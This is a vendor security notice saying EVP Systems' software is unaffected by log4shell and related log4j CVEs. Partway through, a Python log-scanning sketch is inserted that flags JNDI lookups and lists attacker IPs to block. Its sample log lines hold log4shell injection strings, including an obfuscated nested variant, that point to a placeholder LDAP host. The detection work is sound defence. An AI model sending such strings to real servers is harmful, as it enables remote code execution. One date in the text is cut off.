EVP Systems Unaffected by log4shell and Associated Vulnerabilities

All EVP Systems software is unaffected by the recently announced “log4j” vulnerability, officially named CVE-2021-44228 and nicknamed “log4shell.” It is also not subject to CVE-2021-45046 or CVE-2021-45105, two associated vulnerabilities of log4j. EVP Office applications—EstateVal, GiftVal, CostBasis, and CapWatch—do not use the log4j library, and therefore require no mitigation. Most of our internal systems do not use log4j either, but we do have one that has been (repeatedly) upgraded to the latest release, and therefore poses no threat.

Details

On Friday, December 10, 2021, the Apache Foundation announced that log4j, a popular logging library for the Java programming language, had a critical remote code execution (RCE) bug. When programs that use log4j versions 2.0.0 through 2.15.0 are sent a specific series of characters, the target system can be forced to run arbitrary commands. This effectively compromises the entire system. Version 2.16.0 allows for an infinite-recursion denial-of-service attack.

log4j is very popular, and used almost universally by Java programmers. Millions of systems—from banks to stock exchanges to spacecraft—rely on the library to handle the creation and maintenance of their internal logs. That such a foundational piece of shared software was compromised is extremely serious.

Mitigations

As noted, EVP Systems itself is unaffected by the “log4shell” and associated bugs. None of our EVP Office programs use log4j, nor do the vast majority of our internal systems. The one program that does use log4j is running 2.17.0, the latest release as of December 18, 202

However, EVP Systems does not exist in a vacuum, and we are in contact with all of our vendors—our cloud-hosting provider, our e-mail service, our data suppliers, among others—to ensure that their services are not compromised or affected by the bug. If we encounter any issues, we will update our clients accordingly.

We are also monitoring our logs for the specific series of characters that indicate an attempted CVE-2021-44228 / CVE-2021-45046 / CVE-2021-45105 attack. Though all such attacks will fail, we intend to block their source IP addresses to prevent further intrusion attempts that use other known or potential bugs.
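The kind of log monitoring described above can be sketched as follows. This is an added example, not EVP Systems' own code: it assumes a combined-format web access log, and the sample lines, IP addresses and host name are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined access-log format (documentation IPs,
# reserved .invalid host); not taken from any real log.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [13/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://placeholder.invalid/x}"
198.51.100.23 - - [13/Dec/2021:10:01:09 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fplaceholder.invalid%7D HTTP/1.1" 404 0 "-" "curl/7.79"
192.0.2.44 - - [13/Dec/2021:10:02:30 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://placeholder.invalid/x}"
203.0.113.7 - - [13/Dec/2021:10:03:00 +0000] "GET /pricing?plan=${basic} HTTP/1.1" 200 90 "-" "Mozilla/5.0"
"""

# "${jndi:" opens the JNDI lookup behind CVE-2021-44228; match case-insensitively.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup opened inside another lookup is flagged too, since nesting can hide
# the prefix from a plain string match. A lone "${name}" is not flagged.
NESTED = re.compile(r"\$\{[^}]*\$\{")


def fully_unquote(text, max_rounds=3):
    """Undo up to max_rounds layers of percent-encoding."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan(log_text):
    """Map each source IP to the list of reasons its requests were flagged."""
    hits = {}
    for line in log_text.splitlines():
        decoded = fully_unquote(line)
        if JNDI.search(decoded):
            reason = "jndi-lookup"
        elif NESTED.search(decoded):
            reason = "nested-lookup"
        else:
            continue
        source_ip = line.split(" ", 1)[0]  # first field of the access-log line
        hits.setdefault(source_ip, []).append(reason)
    return hits


def block_candidates(hits):
    """Sorted source IPs to hand to a firewall or WAF block list."""
    return sorted(hits)


if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG).items():
        print(ip, reasons)
```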

Questions

If you have any questions about EVP Systems' handling of log4shell / CVE-2021-44228 / CVE-2021-45046 / CVE-2021-45105, please contact our Compliance Department at compliance@evspys.com.

Also, please note that a history of our treatment of high-profile Internet vulnerabilities is always available on our website.

(This article was updated on December 16, 2021 to include information about CVE-2021-45046. It was also updated on December 20, 2021 to include information about CVE-2021-45105.)

Posted on December 13, 2021 • Tagged with EVP Office, Vulnerabilities
